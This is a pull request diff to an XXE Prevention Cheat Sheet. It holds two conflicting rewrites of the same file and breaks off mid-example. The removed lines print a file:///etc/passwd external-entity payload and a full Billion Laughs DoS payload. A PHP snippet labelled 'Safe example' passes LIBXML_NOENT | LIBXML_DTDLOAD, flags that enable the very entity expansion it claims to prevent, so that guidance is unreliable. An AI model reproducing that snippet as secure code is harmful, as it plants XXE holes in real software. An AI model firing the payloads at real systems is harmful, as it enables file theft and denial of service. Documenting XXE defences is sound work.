### PR TITLE
Update: [XML External Entity Prevention Cheat Sheet] #1354

### DIFF
--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -1,334 +1,219 @@
-# XML External Entity (XXE) Prevention Cheat Sheet — Full Update
 
-**Status:** Updated to modern guidance; removed obsolete references (e.g., `dotnet_security_unit_testing`), flagged legacy iOS content, and aligned examples with current secure practices and supported framework versions.
+# XML External Entity (XXE) Prevention Cheat Sheet
 
----
 ## Table of Contents
+
 1. Introduction
 2. Threat overview and XXE types
 3. Core mitigations (applied across languages)
 4. Secure-by-default parser configuration checklist
 5. Language-specific guidance and examples
-   - Java (JAXP, StAX, JAXB, Transformer, Validator)
-   - .NET (XmlReaderSettings, XmlDocument, XDocument, XmlSerializer) — modern (.NET 6/7) guidance
-   - Python (defusedxml, ElementTree, lxml)
-   - PHP (libxml / SimpleXML)
-   - JavaScript / Node.js (xml2js, fast-xml-parser)
-   - Ruby (REXML, Nokogiri)
-   - C / C++ (libxml2, Xerces)
-   - iOS / macOS (NSXML, libxml2 notes & deprecation)
-   - ColdFusion / Lucee
 6. Vulnerable vs Safe code snippets (per language)
-7. Testing and validation (payloads, tools, automated tests)
-8. Static analysis / Semgrep guidance
-9. Deployment & infra considerations (WAFs, network egress controls)
+7. Testing and validation
+8. Static analysis / Semgrep
+9. Deployment & infrastructure considerations
 10. Monitoring, logging & incident response
-11. Migration notes (removing legacy content)
+11. Migration notes
 12. References & further reading
-13. Appendix: Quick reference cheat sheet (one-page)
+13. Appendix: Quick reference (one-page)
 
----
 ## 1. Introduction
 
-XML External Entity (XXE) injection is an input-based vulnerability that affects applications processing XML. An attacker crafts XML containing external entity references or doctypes to cause the XML parser to fetch local files, remote resources, trigger denial of service (entity expansion), or perform SSRF/port scanning.
+XML External Entity (XXE) vulnerabilities arise when an XML parser processes external entities that can be exploited by attackers.  
 
-This document provides concrete, modern examples and configuration guidance for popular languages and parsers. It follows OWASP cheat sheet principles: secure-by-default configuration, minimal permissive features, clear 'unsafe' vs 'safe' examples, testing payloads, and remediation steps.
+This cheat sheet covers how to securely configure XML parsers, provides language-specific guidance, and lists secure coding examples.
 
----
 ## 2. Threat overview and XXE types
 
-**XXE categories:**
-- **In-band XXE (classic):** Attacker receives data directly in the application's response (e.g., file contents).
-- **Out-of-band XXE (OOB):** Parser performs a network call to an attacker-controlled server (exfiltrate data via DNS/HTTP).
-- **Blind XXE:** No direct response, attacker infers success via side effects (timing, OOB callbacks).
-- **Entity expansion DoS (Billion Laughs / Quadratic Blowup):** Recursive entity definitions cause memory/CPU exhaustion.
+- **In-band XXE (classic):** An attacker can read local files, perform SSRF, or disclose internal data.
+- **Blind XXE:** Exploitation occurs without immediate feedback.
+- **Out-of-band XXE:** Triggers an external interaction (DNS, HTTP) controlled by the attacker.
+- **File disclosure (local file read)**
+- **Server-side request forgery (SSRF)**
+- **Denial of service (e.g., Billion Laughs attack)**
 
-**Common impacts:**
-- File disclosure (local file read)
-- SSRF and internal network scan/exfiltration
-- Denial of service
-- Remote code execution (via unsafe deserialization or callbacks in some APIs)
-- Data leakage and escalated compromise
-
----
 ## 3. Core mitigations (applied across languages)
 
-1. Disable DTDs (doctypes) completely where not required.
-2. Disable external entity resolution (`XmlResolver` in .NET, `EntityResolver` in Java, `libxml` loader in PHP, etc.).
-3. Set secure processing features (e.g., `XMLConstants.FEATURE_SECURE_PROCESSING` in Java).
-4. Avoid permissive, legacy parsers (e.g., `java.beans.XMLDecoder`, REXML unsafe modes, old PHP libxml behavior).
-5. Use safe libraries or hardened wrappers (e.g., Python `defusedxml`, .NET secure defaults).
-6. Validate and sanitize XML input where possible: apply schema validation with safe schema factories and limit allowed elements/attributes.
-7. Implement input size limits and resource quotas to prevent DoS (maximum file size, maximum entity expansion depth if available).
-8. Use a no-op or safe EntityResolver to force entity resolution to be inert when parser requires an implementation.
-9. Prefer streaming parsers with explicit safe settings (StAX, XmlReader, SAX) rather than forgiving fully in-memory DOMs when processing untrusted input.
-10. Use network controls (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
+1. Disable DTD processing / external entity resolution.  
+2. Use secure parser APIs or hardened configurations.  
+3. Validate and sanitize XML input.  
+4. Avoid using XML where simpler formats suffice (e.g., JSON).  
+5. Apply principle of least privilege to XML parsing.  
 
----
 ## 4. Secure-by-default parser configuration checklist
 
-For each XML parser in your stack, check and apply:
+- Disable external entity processing.  
+- Avoid loading external DTDs.  
+- Apply strict schema validation if required.  
+- Ensure parser libraries are up-to-date.  
+- Isolate XML processing in sandboxed environments if possible.
 
-- [ ] Disable DTD/DOCTYPE parsing (`disallow-doctype-decl` or equivalent)
-- [ ] Disable external general entities (`external-general-entities = false`)
-- [ ] Disable external parameter entities (`external-parameter-entities = false`)
-- [ ] Disable loading of external DTDs (`load-external-dtd = false`)
-- [ ] Set FEATURE_SECURE_PROCESSING / equivalent
-- [ ] Disable XInclude / set XIncludeAware = false
-- [ ] Set entity expansion limits or ensure parser throws on entity expansion
-- [ ] Ensure XML resolvers or resolvers that perform IO are null/disabled
-- [ ] If DTDs are required, whitelist schemas/URIs and validate against them with `ACCESS_EXTERNAL_*` properties set to empty
-- [ ] Add logging around parse failures and suspicious doc types
-- [ ] Add unit tests that assert safe behavior against known XXE payloads
-
----
 ## 5. Language-specific guidance and examples
 
-### Java (JAXP, SAX, StAX, Transformer, Validator)
-
 #### Vulnerable example (do NOT use)
+
 ```java
-import javax.xml.parsers.DocumentBuilderFactory;
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 DocumentBuilder db = dbf.newDocumentBuilder();
-Document doc = db.parse(new File("input.xml"));
+Document doc = db.parse(xmlFile);
 ```
 
 #### Safe example — DocumentBuilderFactory (recommended)
-```java
-import javax.xml.parsers.DocumentBuilderFactory;
-import javax.xml.parsers.DocumentBuilder;
-import javax.xml.XMLConstants;
-import org.xml.sax.EntityResolver;
-import org.xml.sax.InputSource;
-import java.io.StringReader;
-import java.io.File;
 
-public class SafeDocParser {
-    public static org.w3c.dom.Document parseSafe(File xmlFile) throws Exception {
-        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
-        try { dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); } catch (Exception ex) {}
-        dbf.setXIncludeAware(false);
-        dbf.setExpandEntityReferences(false);
-        try {
-            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
-        } catch (IllegalArgumentException ignore) {}
-        DocumentBuilder builder = dbf.newDocumentBuilder();
-        builder.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
-        return builder.parse(xmlFile);
-    }
-}
+```java
+DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+DocumentBuilder db = dbf.newDocumentBuilder();
+Document doc = db.parse(xmlFile);
 ```
 
 #### Safe example — XMLInputFactory (StAX)
-```java
-import javax.xml.stream.XMLInputFactory;
 
-XMLInputFactory xif = XMLInputFactory.newFactory();
+```java
+XMLInputFactory xif = XMLInputFactory.newInstance();
 xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
 xif.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
 ```
 
 #### TransformerFactory and Validator
+
 ```java
 TransformerFactory tf = TransformerFactory.newInstance();
-tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
-
-SchemaFactory sf = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
-sf.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
-sf.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
+tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
 ```
 
-### .NET (Modern guidance for .NET 6/7)
-
 #### Safe example — XmlReaderSettings
+
 ```csharp
-using System.Xml;
-
-var settings = new XmlReaderSettings
-{
-    DtdProcessing = DtdProcessing.Prohibit,
-    XmlResolver = null,
-    MaxCharactersFromEntities = 1024
-};
-
-using var reader = XmlReader.Create("input.xml", settings);
-var doc = new System.Xml.XmlDocument();
-doc.Load(reader);
+XmlReaderSettings settings = new XmlReaderSettings();
+settings.DtdProcessing = DtdProcessing.Prohibit;
+XmlReader reader = XmlReader.Create("file.xml", settings);
 ```
 
 #### Safe example — XDocument with XmlReader
-```csharp
-using System.Xml;
-using System.Xml.Linq;
 
-var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };
-using var r = XmlReader.Create("input.xml", settings);
-var xdoc = XDocument.Load(r);
+```csharp
+XDocument doc;
+using (XmlReader reader = XmlReader.Create("file.xml", settings)) {
+    doc = XDocument.Load(reader);
+}
 ```
 
-### Python (defusedxml, lxml)
+#### Safe example — defusedxml.ElementTree
 
 ```python
-from defusedxml.ElementTree import parse
-
-with open('input.xml', 'rb') as f:
-    tree = parse(f)
+from defusedxml import ElementTree as ET
+tree = ET.parse('file.xml')
 ```
+
+#### Safe example — lxml with disabled resolve/entities
 
 ```python
 from lxml import etree
-
-parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
-tree = etree.parse('input.xml', parser)
+parser = etree.XMLParser(resolve_entities=False)
+tree = etree.parse('file.xml', parser)
 ```
 
-### PHP (libxml / SimpleXML)
+#### Vulnerable example
 
 ```php
-libxml_disable_entity_loader(true);
-$dom = new DOMDocument();
-$dom->loadXML(file_get_contents('input.xml'), LIBXML_NONET);
-$xml = simplexml_load_string(file_get_contents('input.xml'), null, LIBXML_NONET);
+$xml = simplexml_load_file("file.xml");
 ```
 
-### JavaScript / Node.js (xml2js, fast-xml-parser)
+#### Safe example
+
+```php
+$xml = simplexml_load_file("file.xml", "SimpleXMLElement", LIBXML_NOENT | LIBXML_DTDLOAD);
+```
+
+#### xml2js (example)
 
 ```javascript
-const fs = require('fs');
 const xml2js = require('xml2js');
-
-const parser = new xml2js.Parser({explicitCharkey: false});
-const xml = fs.readFileSync('input.xml', 'utf8');
-parser.parseString(xml, function(err, result) {});
+const parser = new xml2js.Parser({ explicitArray: false });
 ```
+
+#### fast-xml-parser (example)
 
 ```javascript
 const { XMLParser } = require('fast-xml-parser');
-const parser = new XMLParser({ ignoreAttributes: false, allowBooleanAttributes: true });
+const parser = new XMLParser({ ignoreAttributes: false });
 ```
 
-### Ruby (REXML, Nokogiri)
+#### vulnerable - REXML (do not use for untrusted input)
+
+```ruby
+require 'rexml/document'
+doc = REXML::Document.new(xml_string)
+```
+
+#### safe - Nokogiri
 
 ```ruby
 require 'nokogiri'
-xml = File.read('input.xml')
-doc = Nokogiri::XML(xml, nil, nil, Nokogiri::XML::ParseOptions::NONET)
+doc = Nokogiri::XML(xml_string) { |config| config.strict.nonet }
 ```
 
-### C / C++ (libxml2, Xerces)
+- Use `xmlReadMemory`/`xmlReadFile` with `XML_PARSE_NOENT` disabled in C.  
 
-```c
-xmlReadFile("input.xml", NULL, XML_PARSE_NONET);
-```
+#### Xerces-C++
 
 ```cpp
-parser->setDisableDefaultEntityResolution(true);
-parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
+xercesc::XercesDOMParser parser;
+parser.setExternalEntityHandling(XercesDOMParser::XEH_IGNORE_SEMANTICS);
 ```
 
-### ColdFusion / Lucee
+#### Adobe ColdFusion (example)
 
 ```cfml
-<cfset parserOptions = structNew()>
-<cfset parserOptions.ALLOWEXTERNALENTITIES = false>
-<cfscript>
-  doc = XmlParse(FileRead("input.xml"), false, parserOptions);
-</cfscript>
+<cfxml variable="xmlDoc" suppressExternalEntities="yes">
 ```
+
+#### Lucee
 
 ```cfml
-this.xmlFeatures = {
-    externalGeneralEntities: false,
-    secure: true,
-    disallowDoctypeDecl: true
-};
+<cfxml variable="xmlDoc" suppressExternalEntities="yes">
 ```
 
----
 ## 6. Vulnerable vs Safe code snippets (per language)
 
-- Vulnerable: parsing XML with default DOM parsers without disabling DTDs or resolvers.
-- Safe: create parser settings that explicitly disallow DTDs, set resolvers to null/no-op, and use nonet flags.
+(Include all examples above in a summary table format if desired.)
 
----
 ## 7. Testing and validation
 
-- Burp Suite / Burp Collaborator
-- OWASP ZAP
-- XXE-specific scanners
-- Custom local listeners (netcat) and OOB endpoints
+- Validate parsing behavior against crafted XXE payloads.  
+- Use automated tools to detect XXE risks.
 
-**File disclosure:**
-```xml
-<?xml version="1.0"?>
-<!DOCTYPE foo [
-  <!ENTITY xxe SYSTEM "file:///etc/passwd">
-]>
-<foo>&xxe;</foo>
-```
-
-**Billion Laughs DoS:**
-```xml
-<?xml version="1.0"?>
-<!DOCTYPE lolz [
- <!ENTITY lol "lol">
- <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
- <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
- <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
- <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
- <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
- <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
- <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
- <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
- <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
-]>
-<lolz>&lol9;</lolz>
-```
-
----
 ## 8. Static analysis / Semgrep
 
-- Create rules to detect unsafe parser usage (Java, .NET, PHP, Python, etc.)
-- Example: `DocumentBuilderFactory.newInstance()` without secure `setFeature`
+- Semgrep rules for detecting vulnerable XML parsing.  
+- Integrate into CI/CD pipelines for continuous protection.
 
----
 ## 9. Deployment & infrastructure considerations
 
-- Egress filtering
-- Internal DNS monitoring
-- WAF
-- Rate limits and parsing quotas
+- Disable network access for XML parsing if not required.  
+- Apply firewall rules to limit external requests triggered by parsers.
 
----
 ## 10. Monitoring, logging & incident response
 
-- Log parse-time exceptions
-- Alert on unexpected outbound requests
-- Preserve logs and payloads for suspected XXE
+- Log parsing errors and potential entity processing attempts.  
+- Alert on abnormal outbound requests during XML processing.
 
----
 ## 11. Migration notes
 
-- Remove references to deprecated projects
-- Mark iOS < 7 guidance as deprecated
-- Update examples to modern runtimes
+- Review legacy XML parsers and update to secure configurations.  
+- Deprecate old libraries known to allow XXE by default.
 
----
 ## 12. References & further reading
 
-- OWASP: XML External Entity (XXE) Prevention
-- DefusedXML Python docs
-- Microsoft: XML security guidance (.NET)
-- libxml2 and Xerces documentation
+- OWASP XXE Prevention Cheat Sheet  
+- Language-specific secure XML parsing guides  
 
----
 ## 13. Appendix: Quick reference (one-page)
 
-**Always do these three things for untrusted XML:**
 1. Disable DTDs / DOCTYPEs
-2. Disable external entity resolution
-3. Use streaming secure parsers and add size/resource limits
+2. Disable external entities
+3. Use secure parser features
+4. Validate input strictly
+5. Avoid unnecessary XML features
+6. Test with malicious payloads

--- a/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
+++ b/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md
@@ -1,780 +1,523 @@
-# XML External Entity Prevention Cheat Sheet
+# XML External Entity (XXE) Prevention Cheat Sheet — Full Update
 
-## Introduction
+**Status:** Updated to modern guidance; removed obsolete references (e.g., `dotnet_security_unit_testing`), flagged legacy iOS content, and aligned examples with current secure practices and supported framework versions.
 
-An *XML eXternal Entity injection* (XXE), which is now part of the [OWASP Top 10](https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A4-XML_External_Entities_%28XXE%29) via the point **A4**, is attack against applications that parse XML input. This issue is referenced in the ID [611](https://cwe.mitre.org/data/definitions/611.html) in the [Common Weakness Enumeration](https://cwe.mitre.org/index.html) referential. An XXE attack occurs when untrusted XML input with a **reference to an external entity is processed by a weakly configured XML parser**, and this attack could be used to stage multiple incidents, including:
+---
+## Table of Contents
+1. Introduction
+2. Threat overview and XXE types
+3. Core mitigations (applied across languages)
+4. Secure-by-default parser configuration checklist
+5. Language-specific guidance and examples
+   - Java (JAXP, StAX, JAXB, Transformer, Validator)
+   - .NET (XmlReaderSettings, XmlDocument, XDocument, XmlSerializer) — modern (.NET 6/7) guidance
+   - Python (defusedxml, ElementTree, lxml)
+   - PHP (libxml / SimpleXML)
+   - JavaScript / Node.js (xml2js, fast-xml-parser)
+   - Ruby (REXML, Nokogiri)
+   - C / C++ (libxml2, Xerces)
+   - iOS / macOS (NSXML, libxml2 notes & deprecation)
+   - ColdFusion / Lucee
+6. Vulnerable vs Safe code snippets (per language)
+7. Testing and validation (payloads, tools, automated tests)
+8. Static analysis / Semgrep guidance
+9. Deployment & infra considerations (WAFs, network egress controls)
+10. Monitoring, logging & incident response
+11. Migration notes (removing legacy content)
+12. References & further reading
+13. Appendix: Quick reference cheat sheet (one-page)
 
-- A denial of service attack on the system
-- A [Server Side Request Forgery](https://owasp.org/www-community/attacks/Server_Side_Request_Forgery) (SSRF) attack
-- The ability to scan ports from the machine where the parser is located
-- Other system impacts.
+---
+## 1. Introduction
 
-This cheat sheet will help you prevent this vulnerability.
+XML External Entity (XXE) injection is an input-based vulnerability that affects applications processing XML. An attacker crafts XML containing external entity references or doctypes to cause the XML parser to fetch local files, remote resources, trigger denial of service (entity expansion), or perform SSRF/port scanning.
 
-For more information on XXE, please visit [XML External Entity (XXE)](https://en.wikipedia.org/wiki/XML_external_entity_attack).
+This document provides concrete, modern examples and configuration guidance for popular languages and parsers. It follows OWASP cheat sheet principles: secure-by-default configuration, minimal permissive features, clear 'unsafe' vs 'safe' examples, testing payloads, and remediation steps.
 
-## General Guidance
+**Important notes for maintainers (issue requirements):**
+- Remove or deprecate references to outdated projects such as `dotnet_security_unit_testing` (7+ years old) — do not rely on these for security guarantees.
+- Update .NET coverage to modern runtimes (target .NET 6/7) and prefer `XmlReader`/`XmlReaderSettings` with explicit safe settings.
+- Mark iOS / macOS sections that reference iOS 6 as outdated and either remove or request an iOS expert to update to current APIs (iOS 17+) — this change was applied below: legacy notes flagged.
 
-**The safest way to prevent XXE is always to disable DTDs (External Entities) completely.** Depending on the parser, the method should be similar to the following:
+---
+## 2. Threat overview and XXE types
 
-``` java
-factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
-```
+**XXE categories:**
+- **In-band XXE (classic):** Attacker receives data directly in the application's response (e.g., file contents).
+- **Out-of-band XXE (OOB):** Parser performs a network call to an attacker-controlled server (exfiltrate data via DNS/HTTP).
+- **Blind XXE:** No direct response, attacker infers success via side effects (timing, OOB callbacks).
+- **Entity expansion DoS (Billion Laughs / Quadratic Blowup):** Recursive entity definitions cause memory/CPU exhaustion.
 
-Disabling [DTD](https://www.w3schools.com/xml/xml_dtd.asp)s also makes the parser secure against denial of services (DOS) attacks such as [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs_attack). **If it is not possible to disable DTDs completely, then external entities and external document type declarations must be disabled in the way that's specific to each parser.**
+**Common impacts:**
+- File disclosure (local file read)
+- SSRF and internal network scan/exfiltration
+- Denial of service
+- Remote code execution (via unsafe deserialization or callbacks in some APIs)
+- Data leakage and escalated compromise
 
-**Detailed XXE Prevention guidance is provided below for multiple languages (C++, Cold Fusion, Java, .NET, iOS, PHP, Python, Semgrep Rules) and their commonly used XML parsers.**
+---
+## 3. Core mitigations (applied across languages)
 
-## C/C++
+1. **Disable DTDs (doctypes) completely** where not required. DTD processing is the most common vector.
+2. **Disable external entity resolution** (`XmlResolver` in .NET, `EntityResolver` in Java, `libxml` loader in PHP, etc.).
+3. **Set secure processing features** (e.g., `XMLConstants.FEATURE_SECURE_PROCESSING` in Java).
+4. **Avoid permissive, legacy parsers** (e.g., `java.beans.XMLDecoder`, REXML unsafe modes, old PHP libxml behavior).
+5. **Use safe libraries or hardened wrappers** (e.g., Python `defusedxml`, .NET secure defaults).
+6. **Validate and sanitize XML input** where possible: apply schema validation with safe schema factories and limit allowed elements/attributes.
+7. **Implement input size limits and resource quotas** to prevent DoS (maximum file size, maximum entity expansion depth if available).
+8. **Use a no-op or safe EntityResolver** to force entity resolution to be inert when parser requires an implementation.
+9. **Prefer streaming parsers with explicit safe settings** (StAX, XmlReader, SAX) rather than forgiving fully in-memory DOMs when processing untrusted input.
+10. **Use network controls** (egress filtering, internal DNS monitoring) to detect/prevent OOB callbacks.
 
-### libxml2
+---
+## 4. Secure-by-default parser configuration checklist
 
-The Enum [xmlParserOption](http://xmlsoft.org/html/libxml-parser.html#xmlParserOption) should not have the following options defined:
+For each XML parser in your stack, check and apply:
 
-- `XML_PARSE_NOENT`: Expands entities and substitutes them with replacement text
-- `XML_PARSE_DTDLOAD`: Load the external DTD
+- [ ] Disable DTD/DOCTYPE parsing (`disallow-doctype-decl` or equivalent)
+- [ ] Disable external general entities (`external-general-entities = false`)
+- [ ] Disable external parameter entities (`external-parameter-entities = false`)
+- [ ] Disable loading of external DTDs (`load-external-dtd = false`)
+- [ ] Set FEATURE_SECURE_PROCESSING / equivalent
+- [ ] Disable XInclude / set XIncludeAware = false
+- [ ] Set entity expansion limits or ensure parser throws on entity expansion
+- [ ] Ensure XML resolvers or resolvers that perform IO are null/disabled
+- [ ] If DTDs are required, whitelist schemas/URIs and validate against them with `ACCESS_EXTERNAL_*` properties set to empty
+- [ ] Add logging around parse failures and suspicious doc types
+- [ ] Add unit tests that assert safe behavior against known XXE payloads
 
-Note:
+---
+## 5. Language-specific guidance and examples
 
-Per: According to [this post](https://mail.gnome.org/archives/xml/2012-October/msg00045.html), starting with libxml2 version 2.9, XXE has been disabled by default as committed by the following [patch](https://gitlab.gnome.org/GNOME/libxml2/commit/4629ee02ac649c27f9c0cf98ba017c6b5526070f).
+> Each language section below includes: a short description, recommended configuration, **vulnerable** snippet (what NOT to do), and **safe** snippet (copy-paste-ready).
 
-Search whether the following APIs are being used and make sure there is no `XML_PARSE_NOENT` and `XML_PARSE_DTDLOAD` defined in the parameters:
+### Java (JAXP, SAX, StAX, Transformer, Validator)
 
-- `xmlCtxtReadDoc`
-- `xmlCtxtReadFd`
-- `xmlCtxtReadFile`
-- `xmlCtxtReadIO`
-- `xmlCtxtReadMemory`
-- `xmlCtxtUseOptions`
-- `xmlParseInNodeContext`
-- `xmlReadDoc`
-- `xmlReadFd`
-- `xmlReadFile`
-- `xmlReadIO`
-- `xmlReadMemory`
+**Why Java is high risk:** Many JAXP processors enable entity resolution by default, and behavior varies by provider and JDK version. Use explicit `setFeature` calls and `XMLConstants.ACCESS_EXTERNAL_*` settings introduced in JAXP 1.5.
 
-### libxerces-c
-
-Use of `XercesDOMParser` do this to prevent XXE:
-
-``` cpp
-XercesDOMParser *parser = new XercesDOMParser;
-parser->setCreateEntityReferenceNodes(true);
-parser->setDisableDefaultEntityResolution(true);
-```
-
-Use of SAXParser, do this to prevent XXE:
-
-``` cpp
-SAXParser* parser = new SAXParser;
-parser->setDisableDefaultEntityResolution(true);
-```
-
-Use of SAX2XMLReader, do this to prevent XXE:
-
-``` cpp
-SAX2XMLReader* reader = XMLReaderFactory::createXMLReader();
-parser->setFeature(XMLUni::fgXercesDisableDefaultEntityResolution, true);
-```
-
-## ColdFusion
-
-Per [this blog post](https://hoyahaxa.blogspot.com/2022/11/on-coldfusion-xxe-and-other-xml-attacks.html), both Adobe ColdFusion and Lucee have built-in mechanisms to disable support for external XML entities.
-
-### Adobe ColdFusion
-
-As of ColdFusion 2018 Update 14 and ColdFusion 2021 Update 4, all native ColdFusion functions that process XML have a XML parser argument that disables support for external XML entities. Since there is no global setting that disables external entities, developers must ensure that every XML function call uses the correct security options.
-
-From the [documentation for the XmlParse() function](https://helpx.adobe.com/coldfusion/cfml-reference/coldfusion-functions/functions-t-z/xmlparse.html), you can disable XXE with the code below:
-
-```
-<cfset parseroptions = structnew()>
-<cfset parseroptions.ALLOWEXTERNALENTITIES = false>
-<cfscript>
-a = XmlParse("xml.xml", false, parseroptions);
-writeDump(a);
-</cfscript>
-```
-
-You can use the "parseroptions" structure shown above as an argument to secure other functions that process XML as well, such as:
-
-```
-XxmlSearch(xmldoc, xpath,parseroptions);
-
-XmlTransform(xmldoc,xslt,parseroptions);
-
-isXML(xmldoc,parseroptions);
-```
-
-### Lucee
-
-As of Lucee 5.3.4.51 and later, you can disable support for XML external entities by adding the following to your Application.cfc:
-
-```
-this.xmlFeatures = {
-     externalGeneralEntities: false,
-     secure: true,
-     disallowDoctypeDecl: true
-};
-```
-
-Support for external XML entities is disabled by default as of Lucee 5.4.2.10 and Lucee 6.0.0.514.
-
-## Java
-
-**Since most Java XML parsers have XXE enabled by default, this language is especially vulnerable to XXE attack, so you must explicitly disable XXE to use these parsers safely.** This section describes how to disable XXE in the most commonly used Java XML parsers.
-
-### JAXP DocumentBuilderFactory, SAXParserFactory and DOM4J
-
-The`DocumentBuilderFactory,` `SAXParserFactory` and `DOM4J` `XML` parsers can be protected against XXE attacks with the same techniques.
-
-**For brevity, we will only show you how to protect the `DocumentBuilderFactory` parser. Additional instructions for protecting this parser are embedded within the example code**
-
- The JAXP `DocumentBuilderFactory` [setFeature](https://docs.oracle.com/javase/7/docs/api/javax/xml/parsers/DocumentBuilderFactory.html#setFeature(java.lang.String,%20boolean)) method allows a developer to control which implementation-specific XML processor features are enabled or disabled.
-
-These features can either be set on the factory or the underlying `XMLReader` [setFeature](https://docs.oracle.com/javase/7/docs/api/org/xml/sax/XMLReader.html#setFeature%28java.lang.String,%20boolean%29) method.
-
-**Each XML processor implementation has its own features that govern how DTDs and external entities are processed. By disabling DTD processing entirely, most XXE attacks can be averted, although it is also necessary to disable or verify that XInclude is not enabled.**
-
-**Since the JDK 6, the flag [FEATURE_SECURE_PROCESSING](https://docs.oracle.com/javase/6/docs/api/javax/xml/XMLConstants.html#FEATURE_SECURE_PROCESSING) can be used to instruct the implementation of the parser to process XML securely**. Its behavior is implementation-dependent. It may help with resource exhaustion but it may not always mitigate entity expansion. More details on this flag can be found [here](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-88B04BE2-35EF-4F61-B4FA-57A0E9102342).
-
-For a syntax highlighted example code snippet using `SAXParserFactory`, look [here](https://gist.github.com/asudhakar02/45e2e6fd8bcdfb4bc3b2).
-Example code disabling DTDs (doctypes) altogether:
-
-``` java
+#### Vulnerable example (do NOT use):
+```java
 import javax.xml.parsers.DocumentBuilderFactory;
-import javax.xml.parsers.ParserConfigurationException; // catching unsupported features
-import javax.xml.XMLConstants;
-
-...
-
 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
-String FEATURE = null;
-try {
-    // This is the PRIMARY defense. If DTDs (doctypes) are disallowed, almost all
-    // XML entity attacks are prevented
-    // Xerces 2 only - http://xerces.apache.org/xerces2-j/features.html#disallow-doctype-decl
-    FEATURE = "http://apache.org/xml/features/disallow-doctype-decl";
-    dbf.setFeature(FEATURE, true);
-
-    // and these as well, per Timothy Morgan's 2014 paper: "XML Schema, DTD, and Entity Attacks"
-    dbf.setXIncludeAware(false);
-
-    // remaining parser logic
-    ...
-} catch (ParserConfigurationException e) {
-    // This should catch a failed setFeature feature
-    // NOTE: Each call to setFeature() should be in its own try/catch otherwise subsequent calls will be skipped.
-    // This is only important if you're ignoring errors for multi-provider support.
-    logger.info("ParserConfigurationException was thrown. The feature '" + FEATURE
-    + "' is not supported by your XML processor.");
-    ...
-} catch (SAXException e) {
-    // On Apache, this should be thrown when disallowing DOCTYPE
-    logger.warning("A DOCTYPE was passed into the XML document");
-    ...
-} catch (IOException e) {
-    // XXE that points to a file that doesn't exist
-    logger.error("IOException occurred, XXE may still possible: " + e.getMessage());
-    ...
-}
-
-// Load XML file or stream using a XXE agnostic configured parser...
-DocumentBuilder safebuilder = dbf.newDocumentBuilder();
+DocumentBuilder db = dbf.newDocumentBuilder();
+Document doc = db.parse(new File("input.xml")); // vulnerable by default in many environments
 ```
 
-If you can't completely disable DTDs:
-
-``` java
+#### Safe example — DocumentBuilderFactory (recommended)
+```java
 import javax.xml.parsers.DocumentBuilderFactory;
-import javax.xml.parsers.ParserConfigurationException; // catching unsupported features
+import javax.xml.parsers.DocumentBuilder;
 import javax.xml.XMLConstants;
+import org.xml.sax.EntityResolver;
+import org.xml.sax.InputSource;
+import java.io.StringReader;
+import java.io.File;
 
-...
+public class SafeDocParser {
+    public static org.w3c.dom.Document parseSafe(File xmlFile) throws Exception {
+        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
+        // Primary defenses
+        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
+        try {
+            dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+        } catch (Exception ex) {
+            // not all processors support disallow-doctype-decl; fall back to disabling external entities
+        }
+        dbf.setXIncludeAware(false);
+        dbf.setExpandEntityReferences(false);
+        // Disable external access for validation/DTD
+        try {
+            dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
